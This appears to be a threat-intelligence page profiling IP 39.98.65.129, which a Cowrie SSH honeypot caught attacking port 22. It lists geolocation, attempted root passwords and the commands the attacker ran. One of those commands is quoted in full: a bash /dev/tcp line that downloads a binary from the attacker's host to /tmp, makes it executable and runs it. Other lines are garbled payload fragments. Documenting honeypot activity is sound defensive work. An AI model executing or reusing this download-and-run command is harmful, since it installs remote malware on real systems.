Active ThreatLOW

39.98.65.129

Country of Origin🇨🇳 China
First Detection1/10/2026
Last Activity1/10/2026
ISPHangzhou Alibaba Advertising Co.,Ltd.
🎯
14
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
2
Malware

Geolocation

Country
🇨🇳 China
City
Beijing
ASN
AS37963
ISP
Hangzhou Alibaba Advertising Co.,Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

🔐root/123456
1x
🔐root/password
1x

Executed Commands

$nohup bash -c "exec 6<>/dev/tcp/39.98.65.129/60119 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/MAZipcU7v3 && chmod +x /tmp/MAZipcU7v3 && /tmp/MAZipcU7v3 8fgu+Prs9zXv8/D4Ovfy8/A5AMQCBcIF" &1x
$dd bs=1 count=1911588 > /tmp/Gu0ToWG5821x
$>D6@/XJ'81x
$nohup bash -c "exec 6<>/dev/tcp/39.98.65.129/60119 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/MAZipcU7v3 && chmod +x /tmp/MAZipcU7v3 && /tmp/MAZipcU7v3 8fgu+Prs9zXv8/D4Ovfy8/A5AMQCBcIF" &0O0O6(6(Qtd?UPX!1x

Risk Assessment

25
/100
LowMediumHighCritical
IP 39.98.65.129 - Detected Threat | TroyanosYVirus.com | TroyanosYVirus.com